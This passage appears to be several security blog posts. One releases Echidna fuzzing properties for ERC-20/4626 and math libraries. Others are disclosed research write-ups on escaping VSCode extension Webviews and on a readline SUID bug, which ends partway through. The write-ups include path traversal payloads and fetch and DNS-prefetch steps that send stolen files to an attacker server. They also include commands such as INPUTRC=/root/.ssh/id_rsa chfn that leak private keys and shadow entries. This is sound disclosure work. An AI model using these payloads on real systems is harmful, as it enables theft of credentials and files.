Reusable properties for Ethereum contracts

As smart contract security constantly evolves, property-based fuzzing has become a go-to technique for developers and security engineers. This technique relies on the creation of code properties – often called invariants – which describe what the code is supposed to do. To help the community define properties, we are releasing a set of 168 pre-built properties that can be used to guide Echidna, our smart contract fuzzing tool, or directly through unit tests. Properties covered include compliance with the most common ERC token interfaces, generically testable security properties, and properties for testing fixed point math operations.

Since mastering these tools takes time and practice, we will be holding two livestreams on our Twitch and YouTube channels that will provide hands-on experience with these invariants:

  • March 7 – ERC20 properties, example usage, and Echidna cheat codes (Guillermo Larregay)
  • March 14 – ERC4626 properties, example usage, and tips on fuzzing effectively (Benjamin Samuels)

Why should I use this?

The repository and related workshops will demonstrate how fuzzing can provide a much higher level of security assurance than unit tests alone. This collection of properties is simple to integrate with projects that use well-known standards or commonly-used libraries. This release contains tests for the ABDKMath64x64 library, ERC-20 token standard, and ERC-4626 tokenized vaults standard:


  • Properties for standard interface functions
  • Inferred sanity properties (ex: no user balance should be greater than token supply)
  • Properties for extensions such as burnable, mintable, and pausable tokens.


  • Properties that verify rounding directions are compliant with spec
  • Reversion properties for functions that must never revert
  • Differential testing properties (ex: deposit() must match functionality predicted by previewDeposit())
  • Functionality properties (ex: redeem() deducts shares from the correct account)
  • Non-spec security properties (share inflation attack, token approval checks, etc.)


  • Communicative, associative, distributive, and identity properties for relevant functions
  • Differential testing properties (ex: 2^(-x) == 1/2^(x))
  • Reversion properties for functions which should revert for certain ranges of input
  • Negative reversion properties for functions that should not revert for certain ranges of input
  • Interval properties (ex: min(x,y) <= avg(x,y) <= max(x,y))

The goal of these properties is to detect vulnerabilities or deviations from expected results, ensure adherence to standards, and provide guidance to developers writing invariants. By following this workshop, developers will be able to identify complex security issues that cannot be detected with conventional unit and parameterized tests. Furthermore, using this repository will enable developers to focus on deeper systemic issues instead of wasting time on low-hanging fruit.

As a bonus, while creating and testing these properties, we found a bug in the ABDKMath64x64 library: for a specific range of inputs to the divuu function, an assertion could be triggered in the library. More information about the bug, from one of the library's authors, can be found here.

Do It Yourself!

If you don’t want to wait for the livestream, you can get started right now. Here’s how to add the properties to your own repo:

  • Install Echidna.
  • Import the properties into to your project:
    • In case of using Hardhat, use: npm install or yarn add
      In case of using Foundry, use: forge install crytic/properties
  • Create a test contract according to the documentation.

Let’s say you want to create a new ERC20 contract called YetAnotherCashEquivalentToken, and check that it is compliant with the standard. Following the previous steps, you create the following test contract for performing an external test:

pragma solidity ^0.8.0;
import "./path/to/YetAnotherCashEquivalentToken.sol";
import {ICryticTokenMock} from "@crytic/properties/contracts/ERC20/external/util/ITokenMock.sol";
import {CryticERC20ExternalBasicProperties} from "@crytic/properties/contracts/ERC20/external/properties/ERC20ExternalBasicProperties.sol";
import {PropertiesConstants} from "@crytic/properties/contracts/util/PropertiesConstants.sol";

contract CryticERC20ExternalHarness is CryticERC20ExternalBasicProperties {   
    constructor() {
        // Deploy ERC20
        token = ICryticTokenMock(address(new CryticTokenMock()));

contract CryticTokenMock is YetAnotherCashEquivalentToken, PropertiesConstants {

    bool public isMintableOrBurnable;
    uint256 public initialSupply;
    constructor () {
        _mint(USER1, INITIAL_BALANCE);
        _mint(USER2, INITIAL_BALANCE);
        _mint(USER3, INITIAL_BALANCE);
        _mint(msg.sender, INITIAL_BALANCE);

        initialSupply = totalSupply();
        isMintableOrBurnable = false;

Then, a configuration file is needed to set the fuzzing parameters to run in Echidna:

corpusDir: "tests/crytic/erc20/echidna-corpus-internal"
testMode: assertion
testLimit: 100000
deployer: "0x10000"
sender: ["0x10000", "0x20000", "0x30000"]
multi-abi: true

Finally, run Echidna on the test contract:

echidna-test . --contract CryticERC20ExternalHarness --config tests/echidna-external.yaml

Furthermore, this effort is fluid. Some ideas for future work include:

  • Test more of the widely-used mathematical libraries with our properties, such as PRBMath (properties/issues/2).
  • Add tests for more ERC standards (properties/issues/5).
  • Create a corpus of tests for other commonly used functions or contracts that are not standards, such as AMMs or liquidity pools (properties/issues/4).

Escaping well-configured VSCode extensions (for profit)

By Vasco Franco

In part one of this two-part series, we escaped Webviews in real-world misconfigured VSCode extensions. But can we still escape extensions if they are well-configured?

In this post, we’ll demonstrate how I bypassed a Webview’s localResourceRoots by exploiting small URL parsing differences between the browser—i.e., the Electron-created Chromium instance where VSCode and its Webviews run—and other VSCode logic and an over-reliance on the browser to do path normalization. This bypass allows an attacker with JavaScript execution inside a Webview to read files anywhere in the system, including those outside the localResourceRoots. Microsoft assigned this bug CVE-2022-41042 and awarded us a bounty of $7,500 (about $2,500 per minute of bug finding).

Finding the issue

While exploiting the vulnerabilities detailed in the last post, I wondered if there could be bugs in VSCode itself that would allow us to bypass any security feature that limits what a Webview can do. In particular, I was curious if we could still exploit the bug we found in the SARIF Viewer extension (vulnerability 1 in part 1) if there were stricter rules in the Webview’s localResourceRoots option.

From last post’s SARIF viewer exploit, we learned that you can always exfiltrate files using DNS prefetches if you have the following preconditions:

  • You can execute JavaScript in a Webview. This enables you to add link tags to the DOM.
  • The CSP’s connect-src directive has the source. This enables you to fetch local files.

…Files within the localResourceRoots folders, that is! This option limits the folders from which a Webview can read files, and, in the SARIF viewer, it was configured to limit, well… nothing. But such a permissive localResourceRoots is rare. Most extensions only allow access to files in the current workspace and in the extensions folder (the default values for the localResourceRoots option).

Recall that Webviews read files by fetching the “fake” domain, as shown in the example below.

Example of how to fetch a file from a VSCode extension Webview

Without even looking at how the code enforced the localResourceRoots option, I started playing around with different path traversal payloads with the goal of escaping from the root directories where we are imprisoned. I tried a few payloads, such as:

  • /etc/passwd
  • /../../../../../etc/passwd
  • /[valid_root]/../../../../../etc/passwd

As I expected, this didn’t work. The browser normalized the request’s path even before it reached VSCode, as shown in the image below.

Unsuccessful fetches of the /etc/passwd file

I started trying different variants that the browser would not normalize, but that some VSCode logic might consider a valid path. In about three minutes, to my surprise, I found out that using %2f.. instead of /.. allowed us to escape the root folder(!!!).

Successful fetch of the /etc/passwd file when using the / character URL encoded as %2f

We’ve escaped! We can now fetch files from anywhere in the filesystem. But why did this work? VSCode seems to decode the %2f, but I couldn’t really understand what was happening under the hood. My initial assumption was that the function that reads the file (e.g., the fs.readFile function) was decoding the %2f, while the path normalization function did not. As we’ll see, this was not a bad guess, but not quite the real cause.

Root cause analysis

Let’s start from the beginning and see how VSCode handles requests—remember, this is not a real domain.

It all starts in the service worker running on the Webview. This service worker intercepts every Webview’s request to the domain and transforms it into a postMessage('load-resource') to the main VSCode thread.

Code from the Webview’s service worker that intercepts fetch requests that start with and transforms them in a postMessage to the main VSCode thread (source)

VSCode will handle the postMessage('load-resource') call by building a URL object and calling loadResource, as shown below.

VSCode code that handles a load-resource postMessage. Highlighted in red is the code that decodes the fetched path—the first reason why our exploit works. (source)

Notice that the URL path is decoded with decodeURIComponent. This is why our %2f is decoded! But this alone still doesn’t explain why the path traversal works. Normalizing the path before checking if the path belongs to one of the roots would prevent our exploit. Let’s keep going.

The loadResource function simply calls loadLocalResource with roots: localResourceRoots.

The loadResource function calling loadLocalResource with the localResourceRoots option (source)

Then, the loadLocalResource function calls getResourceToLoad, which will iterate over each root in localResourceRoots and check if the requested path is in one of these roots. If all checks pass, loadLocalResource reads and returns the file contents, as shown below.

Code that checks if a path is within the expected root folders and returns the file contents on success. Highlighted in red is the .startsWith check without any prior normalization—the second reason our exploit works. (source)

There is no path normalization, and the root check is done with resourceFsPath.startsWith(rootPath). This is why our path traversal works! If our path is [valid-root-path]/../../../../../etc/issue, we’ll pass the .startsWith check even though our path points to somewhere outside of the root.

In summary, two mistakes allow our exploit:

  • The VSCode extension calls decodeURIComponent(path) on the path, decoding %2f to /. This allows us to bypass the browser’s normalization and introduce ../ sequences in the path.
  • The containsResource function checks that the requested file is within the expected localResourceRoots folder with the startsWith function without first normalizing the path (i.e., removing the ../ sequences). This allows us to traverse outside the root with a payload such as [valid-root-path]/../../../.

This bug is hard to spot by just manually auditing the code. The layers of abstraction and all the message passing mask where our data flows through, as well as some of the critical details that make the exploit work. This is why evaluating and testing software by executing the code and observing its behavior at runtime—dynamic analysis—is such an important part of auditing complex systems. Finding this bug through static analysis would require defining sources, sinks, sanitizers, and an interprocedural engine capable of understanding data that is passed in postMessage calls. After all that work, you may still end up with a lot of false positives and false negatives; we use static analysis tools extensively at Trail of Bits, but they’re not the right tool for this job.

Recommendations for preventing path traversals

In the last blog’s third vulnerability, we examined a path traversal vulnerability caused by parsing a URL’s query string with flawed hand-coded logic that allowed us to circumvent the path normalization done by the browser. These bugs are very similar; in both cases, URL parsing differences and the reliance on the browser to do path normalization resulted in path traversal vulnerabilities with critical consequences.

So, when handling URLs, we recommend following these principles:

  • Parse the URL from the path with an appropriate object (e.g., JavaScript’s URL class) instead of hand-coded logic.
  • Do not transform any URL components after normalization unless there is a very good reason to do so. As we’ve seen, even decoding the path with a call to decodeURIComponent(path) was enough to fully bypass the localResourceRoots feature since other parts of the code had assumptions that the browser would have normalized the path. If you want to read more about URL parsing discrepancies and how they can lead to critical bugs, I recommend reading A New Era of SSRF by Orange Tsai and Exploiting URL Parsing Confusion.
  • Always normalize the file path before checking if the file is within the expected root. Doing both operations together, ideally in the same encapsulated function, ensures that no future or existing code will transform the path in any way that invalidates the normalization operation.


  • September 7, 2022: Reported the bug to Microsoft
  • September 16, 2022: Microsoft confirmed the behavior of the report and mentioned that the case is being reviewed for a possible bounty award
  • September 20, 2022: Microsoft marks the report as out-of-scope for a bounty because “VS code extensions are not eligible for bounty award”
  • September 21, 2022: I reply mentioning that the bug is in the way VSCode interacts with extensions, but not in a VSCode extension
  • September 24, 2022: Microsoft acknowledges their mistake and awards the bug a $7,500 bounty.
  • October 11, 2022: Microsoft fixes the bug in PR #163327 and assigns it CVE-2022-41042.

Escaping misconfigured VSCode extensions

By Vasco Franco

TL;DR: This two-part blog series will cover how I found and disclosed three vulnerabilities in VSCode extensions and one vulnerability in VSCode itself (a security mitigation bypass assigned CVE-2022-41042 and awarded a $7,500 bounty). We will identify the underlying cause of each vulnerability and create fully working exploits to demonstrate how an attacker could have compromised your machine. We will also recommend ways to prevent similar issues from occurring in the future.

A few months ago, I decided to assess the security of some VSCode extensions that we frequently use during audits. In particular, I looked at two Microsoft extensions: SARIF viewer, which helps visualize static analysis results, and Live Preview, which renders HTML files directly in VSCode.

Why should you care about the security of VSCode extensions? As we will demonstrate, vulnerabilities in VSCode extensions—especially those that parse potentially untrusted input—can lead to the compromise of your local machine. In both the extensions I reviewed, I found a high-severity bug that would allow an attacker to steal all of your local files. With one of these bugs, an attacker could even steal your SSH keys if you visited a malicious website while the extension is running in the background.

During this research, I learned about VSCode Webviews—sandboxed UI panels that run in a separate context from the main extension, analogous to an iframe in a normal website—and researched avenues to escape them. In this post, we’ll dive into what VSCode Webviews are and analyze three vulnerabilities in VSCode extensions, two of which led to arbitrary local file exfiltration. We will also look at some interesting exploitation tricks: leaking files using DNS to bypass restrictive Content-Security-Policy (CSP) policies, using srcdoc iframes to execute JavaScript, and using DNS rebinding to elevate the impact of our exploits.

In an upcoming blog post, we’ll examine a bug in VSCode itself that allows us to escape a Webview’s sandbox even in a well-configured extension.

VSCode Webviews

Before diving into the bugs, it’s important to understand how a VSCode extension is structured. VSCode is an Electron application with privileges to access the filesystem and execute arbitrary shell commands; extensions have all the same privileges. This means that if an attacker can execute JavaScript (e.g., through an XSS vulnerability) in a VSCode extension, they can achieve a full compromise of the system.

As a defense-in-depth protection against XSS vulnerabilities, extensions have to create UI panels inside sandboxed Webviews. These Webviews don’t have access to the NodeJS APIs, which allow the main extension to read files and run shell commands. Webviews can be further limited with several options:

  • enableScripts: prevents the Webview from executing JavaScript if set to false. Most extensions require enableScripts: true.
  • localResourceRoots: prevents Webviews from accessing files outside of the directories specified in localResourceRoots. The default is the current workspace directory and the extension’s folder.
  • Content-Security-Policy: mitigates the impact of XSS vulnerabilities by limiting the sources from which the Webview can load content (images, CSS, scripts, etc.). The policy is added through a meta tag of the Webview’s HTML source, such as:
     <meta http-equiv="Content-Security-Policy" content="default-src 'none';">

Sometimes, these Webview panels need to communicate with the main extension to pass some data or ask for a privileged operation that they cannot perform on their own. This communication is achieved by using the postMessage() API.

Below is a simple, commented example of how to create a Webview and how to pass messages between the main extension and the Webview.

Example of a simple extension that creates a Webview

An XSS vulnerability inside the Webview should not lead to a compromise if the following conditions are true: localResourceRoots is correctly set up, the CSP correctly limits the sources from which content can be loaded, and no postMessage handler is vulnerable to problems such as command injection. Still, you should not allow arbitrary execution of untrusted JavaScript inside a Webview; these security features are in place as a defense-in-depth protection. This is analogous to how a browser does not allow a renderer process to execute arbitrary code, even though it is sandboxed.

You can read more about Webviews and their security model in VSCode’s documentation for Webviews.

Now that we understand Webviews a little better, let’s take a look at three vulnerabilities that I found during my research and how I was able to escape Webviews and exfiltrate local files in two VSCode extensions built by Microsoft.

Vulnerability 1: HTML/JavaScript injection in Microsoft’s SARIF viewer

Microsoft’s SARIF viewer is a VSCode extension that parses SARIF files—a JSON-based file format into which most static analysis tools output their results—and displays them in a browsable list.

Since I use the SARIF viewer extension in all of our audits to triage static analysis results, I wanted to know how well it was protected against loading untrusted SARIF files. These untrusted files can be downloaded from an untrusted source or, more likely, result from running a static analysis tool—such as CodeQL or Semgrep—with a malicious rule containing metadata that can manipulate the resulting SARIF file (e.g., the finding’s description).

While examining the code where the SARIF data is rendered, I came across a suspicious-looking snippet in which the description of a static analysis result is rendered using the ReactMarkdown class with the escapeHtml option set to false.

Code that unsafely renders the description of a finding parsed from a SARIF file (source)

Since HTML is not escaped, by controlling the markdown field of a result’s message, we can inject arbitrary HTML and JavaScript in the Webview. I quickly threw up a proof of concept (PoC) that automatically executed JavaScript using the onerror handler of an img with an invalid source.

Portion of a SARIF file that triggers JavaScript execution in the SARIF Viewer extension

Portion of a SARIF file that triggers JavaScript execution in the SARIF Viewer extension

It worked! The picture below shows the exploit in action.

PoC exploit in action. On the right, we see the JavaScript injected in the DOM. On the left, we see where it is rendered.

PoC exploit in action. On the right, we see the JavaScript injected in the DOM. On the left, we see where it is rendered.

This was the easy part. Now, we need to weaponize this bug by fetching sensitive local files and exfiltrating them to our server.

Fetching local files

Our HTML injection is inside a Webview, which, as we saw, is limited to reading files inside its localResourceRoots. The Webview is created with the following code:

Code that creates the Webview in the SARIF viewer extension with an unsafe localResourceRoots option (source)

As we can see, localResourceRoots is configured very poorly. It allows the Webview to read files from anywhere on the disk, up to the z: drive! This means that we can just read any file we want—for example, a user’s private key at ~/.ssh/id_rsa.

Inside the Webview, we cannot open and read a file since we don’t have access to NodeJS APIs. Instead, we make a fetch to, and the file contents are sent in the response (if the file exists and is within the localResourceRoots path).

To leak /etc/issue, all we need is to make the following fetch:

Example of code that reads the /etc/issue file inside a Webview

Example of code that reads the /etc/issue file inside a Webview

Exfiltrating files

Now, we just need to send the file contents to our remote server. Normally, this would be easy; we would make a fetch to a server we control with the file’s contents in the POST body or in a GET parameter (e.g., fetch('')).

However, the Webview has a fairly restrictive CSP. In particular, the connect-src directive restricts fetches to self and https://* Since we don’t control either source, we cannot make fetches to our attacker-controlled server.

CSP of the SARIF viewer extension’s Webview (source)

We can circumvent this limitation with, you guessed it, DNS! By injecting tags with the rel="dns-prefetch" attribute, we can leak file contents in subdomains even with the restrictive CSP connect-src directive.

Example of HTML code that leaks files using DNS to circumvent a restrictive CSP

To leak the file, all we need is to encode the file in hex and inject tags in the DOM, where the href points to our attacker-controlled server with the encoded file contents in the subdomains. We just need to ensure that each subdomain has at most 64 characters (including the .s) and that the whole subdomain has less than 256 characters.

Putting it all together

By combining these techniques, we can build an exploit that exfiltrates the user’s $HOME/.ssh/id_rsa file. Here is the commented exploit:

Exploit that steals a user’s private key when they open a compromised SARIF file in the SARIF viewer extension

This was all possible because the extension used the ReactMarkdown component with the escapeHtml = {false} option, allowing an attacker with partial control of a SARIF file to inject JavaScript in the Webview. Thanks to a very permissive localResourceRoots, the attacker could take any file from the user’s filesystem. Would this vulnerability still be exploitable with a stricter localResourceRoots? Wait for the second blog post! ;)

To detect these issues automatically, we improved Semgrep’s existing ReactMarkdown rule in PR #2307. Try it out against React codebases with semgrep --config "p/react."

Vulnerability 2: HTML/JavaScript injection in Microsoft’s Live Preview extension

Microsoft’s Live Preview, a VSCode extension with more than 1 million installs, allows you to preview HTML files from your current workspace in an embedded browser directly in VSCode. I wanted to understand if I could safely preview malicious HTML files using the extension.

The extension starts by creating a local HTTP server on port 3000, where it hosts the current workspace directory and all of its files. Then, to render a file, it creates an iframe that points to the local HTTP server (e.g., iframe src=”http://localhost:3000/file.html” ) inside a Webview panel. (Sandboxing inception!) This architecture allows the file to execute JavaScript without affecting the main Webview.

The inner preview iframe and the outer Webview communicate using the postMessage API. If we want to inject HTML/JavaScript in the Webview, its postMessage handlers are a good place to start!

Finding an HTML/JavaScript injection

We don’t have to look hard! The link-hover-start handler is vulnerable to HTML injection because it directly passes input from the iframe message (which we control the contents of) to the innerHTML attribute of an element of the Webview without any sanitization. This allows an attacker to control part of the Webview’s HTML.

Code where the innerHTML of a Webview element is set to the contents of the message originated in the HTML file being previewed. (source)

Achieving JavaScript execution with srcdoc iframes

The naive approach of setting innerHTML to

 <script> console.log('HELLO'); </script> 

does not work because the script is added to the DOM but does not get loaded. Thankfully, there’s a neat trick we can use to circumvent this limitation: writing the script inside an srcdoc iframe, as shown in the figure below.

PoC that uses an srcdoc iframe to trigger JavaScript execution when set to the innerHTML of a DOM element

The browser considers srcdoc iframes to have the same origin as their parent windows. So even though we just escaped one iframe and injected another, this srcdoc iframe will have access to the Webview’s DOM, global variables, and functions.

The downside is that the iframe is now ruled by the same CSP as the Webview.

default-src 'none';
connect-src ws:// 'self';
font-src 'self' https://*;
style-src 'self' https://*;
script-src 'nonce-';
CSP of the Live Preview extension’s Webview (source)

In contrast with the first vulnerability , this CSP’s script-src directive does not include unsafe-inline, but instead uses a nonce-based script-src. This means that we need to know the nonce to be able to inject our arbitrary JavaScript. We have a few options to accomplish this: brute-force the nonce, recover the nonce due to poor randomness, or leak the nonce.

The nonce is generated with the following code:

Code that generates the nonce used in the CSP of the Live Preview extension’s Webview (source)

Brute-forcing the nonce

While we can try as many nonces as we please without repercussion, the nonce has a length of 64 with an alphabet of 62 characters, so the universe would end before we found the right one.

Recovering the nonce due to poor randomness

An astute reader might have noticed that the nonce-generating function uses Math.random, a cryptographically unsafe random number generator. Math.random uses the xorshift128+ algorithm behind the scenes, and, given X random numbers, we can recover the algorithm’s internal state and predict past and future random numbers. See, for example, the Practical Exploitation of Math.random on V8 conference talk, and an implementation of the state recovery.

My idea was to call Math.Random repeatedly in our inner iframe and recover the state used to generate the nonce. However, the inner iframe, the outer Webview, and the main extension that created the random nonce have different instances of the internal algorithm state; we cannot recover the nonce this way.

Leaking the nonce

The final option was to leak the nonce. I searched the Webview code for postMessage handlers that sent data into the inner iframe (the one we control) in the hopes that we could somehow sneak in the nonce.

Our best bet is the findNext function, which sends the value of the find-input element to our iframe.

Code that shows the Webview sending the contents of the find-input value to the previewed page (source)

My goal was to somehow make the Webview attach the nonce to a “fake” find-input element that we would inject using our HTML injection. I dreamed of injecting an incomplete element like input id="find-input" value=" : This would create a “fake” element with the find-input ID, and open its value attribute without closing it. However, this was doomed to fail for multiple reasons. First, we cannot escape from the element we are setting the innerHTML to, and since we are writing it in full, it could never contain the nonce. Second, the DOM parser does not parse the HTML in the example above; our element is just left empty. Finally, the document.getElementById('find-input') always finds the already existing element, not the one we injected.

At this point, I was at a dead end; the CSP effectively prevented the full exploit. But I wanted more! In the next vulnerability, we’ll look at another bug that I used to fully exploit the Live Preview extension without injecting any JavaScript in the Webview.

Vulnerability 3: Path traversal in the local HTTP server in Microsoft’s Live Preview extension

Since we couldn’t get around the CSP, I thought another interesting place to investigate was the local HTTP server that serves the HTML files to be previewed. Could we fetch arbitrary files from it or could we only fetch files in the current workspace?

The HTTP server will serve any file in the current workspace, allowing an HTML file to load JavaScript files or images in the same workspace. As a result, if you have sensitive files in your current workspace and preview a malicious HTML file in the same workspace, the malicious file can easily fetch and exfiltrate the sensitive files. But this is by design, and it is unlikely that a user’s workspace will have both malicious and sensitive files. Can we go further and leak files from elsewhere on the filesystem?

Below is a simplified version of the code that handles each HTTP request.

Code that servers the Live Preview extension’s local HTTP server (source)

My goal was to find a path traversal vulnerability that would allow me to escape the basePath root.

Finding a path traversal bug

The simple approach of calling fetch("../../../../../../etc/passwd") does not work because the browser normalizes the request to fetch("/etc/passwd"). However, the server logic does not prevent this path traversal attack; the following cURL command retrieves the /etc/passwd file!

curl --path-as-is
cURL command that demonstrates that the server does not prevent path traversal attacks

This can’t be achieved through a browser, so this exploitation path is infeasible. However, I noticed slight differences in how the browser and the HTTP server parse the URL that may allow us to pull off our path traversal attack. The server uses hand-coded logic to parse the URL’s query string instead of using the JavaScript URL class, as shown in the snippet below.

Code with hand-coded logic to parse a URL’s query string (source)

This code splits the query string from the URL using lastIndexOf('?'). However, a browser will parse a query string from the first index of ?. By fetching ?../../../../../../etc/passwd?AAA the browser will not normalize the ../ sequences because they are part of the query string from the browser’s point of view (in green in the figure below). From the server’s point of view (in blue in the figure below), only AAA is part of the query string, so the URLPathName variable will be set to ?../../../../../../etc/passwd, and the full path will be normalized to /etc/passwd with path.join(basePath ?? '', URLPathName). We have a path traversal!

URL parsing differences between the browser and the server

Exploitation scenario 1

If an attacker controls a file that a user opens with the VSCode Live Preview extension, they can use this path traversal to leak arbitrary user files and folders.

In contrast with vulnerability 1, this exploit is quite straightforward. It follows these simple steps:

  1. From the HTML file being previewed, fetch the file or directory that we want to leak with fetch(""). (Note that we can see the fetch results even without a CORS policy because our exploit file is also hosted on the origin.)
  2. Encode the file contents in base64 with leaked_file_b64 = btoa(leaked_file).
  3. Send the encoded file to our attacker-controlled server with fetch("http://?q=" + leaked_file_b64).

Here is the commented exploit:

Exploit that exfiltrates local files when a user previews a malicious HTML file with the Live Preview extension

Exploitation scenario 2

The previous attack scenario only works if a user previews an attacker-controlled file, but using that exploit is going to be very hard. But we can go further! We can increase the vulnerability’s impact by only requiring that the victim visits an attacker’s website while the Live Preview HTTP server is running in the background with DNS rebinding—a common technique to exploit unauthenticated internal services.

In a DNS rebinding attack, an attacker changes a domain’s DNS record between two IPs—the attacker server’s IP and the local server’s IP (commonly Then, by using JavaScript to fetch this changing domain, an attacker will trick the browser into accessing local servers without any CORS warnings since the origin remains the same. For a more complete explanation of DNS Rebinding attacks, see this blog post.

To set up our exploit, we’ll do the following:

  1. Host our attacker-controlled server with the exploit at
  2. Use the rbndr service with the domain that flips its DNS record between and

(NOTE: If you want to reproduce this setup, ensure that running host will alternate between the two IPs. This works flawlessly on my Linux machine, with as the DNS server.)

To steal a victim’s local files, we need to make them browse to the URL, hoping that it will resolve to our server with the exploit. Then, our exploit page makes fetches with the path traversal attack on a loop until the browser makes a DNS request that resolves to the IP; once it does so, we get the content of the sensitive file. Here is the commented exploit:

Exploit that exfiltrates local files when a user visits a malicious web page while the Live Preview extension is running in the background

How to secure VSCode Webviews

Webviews have strong defaults and mitigations to minimize a vulnerability’s impact. This is great, and it totally prevented a full compromise in our vulnerability 2! However, these vulnerabilities also showed that extensions—even those built by Microsoft, the creators of VSCode—can be misconfigured. For example, vulnerability 1 is a glaring example of how not to set up the localResourceRoots option.

If you are building a VSCode extension and plan on using Webviews, we recommend following these principles:

  1. Restrict the CSP as much as possible. Start with default-src 'none' and add other sources only as needed. For the script-src directive, avoid using unsafe-inline; instead, use a nonce or hash-based source. If you use a nonce-based source, generate it with a cryptographically-strong random number generator (e.g., crypto.randomBytes(16).toString('base64'))
  2. Restrict the localResourceRoots option as much as possible. Preferably, allow the Webview to read only files from the extension’s installation folder.
  3. Ensure that any postMessage handlers in the main extension thread are not vulnerable to issues such as SQL injection, command injection, arbitrary file writes, or arbitrary file reads.
  4. If your extension runs a local HTTP server, minimize the risk of path traversal attacks by:
    • Parsing the URL from the path with an appropriate object (e.g., JavaScript’s URL class) instead of hand-coded logic.
    • Checking if the file is within the expected root after normalizing the path and right before reading the file.
  5. If your extension runs a local HTTP server, minimize the risk of DNS rebinding attacks by:
    • Spawning the server on a random port and using the Webview’s portMapping option to map the random localhost port to a static one in the Webview. This will limit an attacker’s ability to fingerprint if the server is running and make it harder for them to brute-force the port. It has the added benefit of seamlessly handling cases where the hard-coded port is in use by another application.
    • Allowlisting the Host header with only localhost and (like CUPS does). Alternatively, authenticate the local server.
  6. And, of course, don’t flow user input into .innerHTML—but you already knew that one. If you’re trying to add text to an element, use .innerText instead.

If you follow these principles you’ll have a well-configured VSCode extension. Nothing can go wrong, right? In a second blog post, we’ll examine a bug in VSCode itself that allows us to escape a Webview’s sandbox even in a well-configured extension.


  • August 12, 2022: Reported vulnerability 1 to Microsoft
  • August 13–16, 2022: Vulnerability 1 was fixed in c054421 and 98816d9
  • September 7, 2022: Reported vulnerability 2 and 3 to Microsoft
  • September 14, 2022: Vulnerability 2 fixed in 4e029aa
  • October 5, 2022: Vulnerability 3 fixed in 9d26055 and 88503c4

Readline crime: exploiting a SUID logic bug

By roddux // Rory M

I discovered a logic bug in the readline dependency that partially reveals file information when parsing the file specified in the INPUTRC environment variable. This could allow attackers to move laterally on a box where sshd is running, a given user is able to login, and the user’s private key is stored in a known location (/home/user/.ssh/id_rsa).

This bug was reported and patched back in February 2022, and chfn isn’t typically provided by util-linux anyway, so your boxen are probably fine. I’m writing about this because the exploit is amusing, as it’s made possible due to a happy coincidence of the readline configuration file parsing functions marrying up well to the format of SSH keys—explained further in this post.


$ INPUTRC=/root/.ssh/id_rsa chfn
Changing finger information for user.
readline: /root/.ssh/id_rsa: line 1: -----BEGIN: unknown key modifier
readline: /root/.ssh/id_rsa: line 2: b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn: no key sequence terminator


readline: /root/.ssh/id_rsa: line 37: avxwhoky6ozXEAAAAJcm9vdEBNQVRFAQI=: no key sequence terminator
readline: /root/.ssh/id_rsa: line 38: -----END: unknown key modifier
Office [b]: ^C

Finding the bug

I was recently enticed by SUID bugs after fawning over the Qualys sudo bug a while back. As I was musing through The Art of Software Security Assessment —vol. 2 wen?— I was spurred into looking at environment variables as an attack surface. With a couple of hours to kill, I threw an interposing library into /etc/ to log getenv calls:

#define _GNU_SOURCE

// gcc getenv.c -fPIC -shared -ldl -o

char *(*_real_getenv)(const char *) = 0;
char *getenv(const char *name) {
      if(!_real_getenv) _real_getenv = dlsym(RTLD_NEXT, "getenv");
      char *res = _real_getenv(name);
      syslog(1, "getenv(\"%s\") => \"%s\"\n", name, res);
      return res;

NB: We’re just going to pretend this is how I did it from the get-go, and that I didn’t waste time screwing around trying to get SUID processes launched under gdb.

With the logging library in place, I ran find / -perm /4000 (yes, I Googled the arguments) to find all of the SUID binaries on my system.

If you’re playing along, be warned: logging all getenv calls is insanely noisy and leads to many tedious, repetitive, uninteresting, and repetitive results. After blowing through countless (like, 20) variations of LC_MESSAGES, SYSTEMD_IGNORE_USERDB, SYSTEMD_IGNORE_CHROOT and friends, I came across INPUTRC, which is used somewhere in the chfn command. Intuiting that INPUTRC refers to a configuration file, I blindly passed INPUTRC=/etc/shadow to see what would happen…

$ INPUTRC=/etc/shadow chfn
Changing finger information for user.
readline: /etc/shadow: line 9: systemd-journal-remote: unknown key modifier
readline: /etc/shadow: line 10: systemd-network: unknown key modifier
readline: /etc/shadow: line 11: systemd-oom: unknown key modifier
readline: /etc/shadow: line 12: systemd-resolve: unknown key modifier
readline: /etc/shadow: line 13: systemd-timesync: unknown key modifier
readline: /etc/shadow: line 14: systemd-coredump: unknown key modifier
Office [b]: ^C

Hmmmmm. /etc/shadow? In my terminal? It’s more likely than you think.

Between the lines: root cause analysis

My first thought was to Google “INPUTRC.” Helpfully, the first result of my search gave me clues that it was related to the readline library. Indeed, by digging through the readline-8.1 source code, I found that “INPUTRC” is passed (via sh_get_env_value) as a parameter to getenv. Looks about right!

int rl_read_init_file (const char *filename) {
  // ...
  if (filename == 0)
    filename = sh_get_env_value ("INPUTRC");     // <- bingo

Searching the readline codebase for the error message “unknown key modifier” that we saw earlier also turns up results. rl_read_init_file calls _rl_read_init_file, which routes to the rl_parse_and_bind function, which emits the error. From this call stack, we can deduce the error occurs when readline attempts to parse the input file—specifically, when it tries to interpret the file contents as a keybind configuration.

Let’s take it from the top. After skipping whitespace, _rl_read_init_file calls rl_parse_and_bind for each non-comment line in the input file. The rl_parse_and_bind function contains four error paths that lead to _rl_init_file_error, which prints the line currently being parsed. This is the root of the bug, as readline is not aware that it’s running with elevated privileges, and assumes it’s safe to print parts of the input file.

_rl_init_file_error is called with the argument string (which is the current line as it loops over the config file) on lines 1557, 1569, 1684, and 1759. Several other error paths can result in partial disclosure of the current line; they are omitted here for brevity. We will also skip looking at what would happen with passing binary files.

By examining the conditions required to reach the paths mentioned above, we can deduce the conditions under which we can leak lines from a file:

  1. We can leak a line that begins with a quotation mark and does not have a closing quotation mark:
    if (*string == '"') {
        i = _rl_skip_to_delim (string, 1, '"');
        /* If we didn't find a closing quote, abort the line. */
        if (string[i] == '\0') {
            _rl_init_file_error ("%s: no closing `\"' in key binding", string);
            return 1;
          i++;    /* skip past closing double quote */
    $ cat test 
    $ INPUTRC=test chfn
    Changing finger information for user.
    readline: test: line 1: "AAAAA: no closing `"' in key binding
    Office [test]: ^C
  2. We can leak a line that starts with a colon and contains no whitespace or nulls:
    i = 0;
    // ...
    /* Advance to the colon (:) or whitespace which separates the two objects. */
    for (; (c = string[i]) && c != ':' && c != ' ' && c != '\t'; i++ );
    if (i == 0) {
        _rl_init_file_error ("`%s': invalid key binding: missing key sequence", string);
        return 1;
    $ cat test
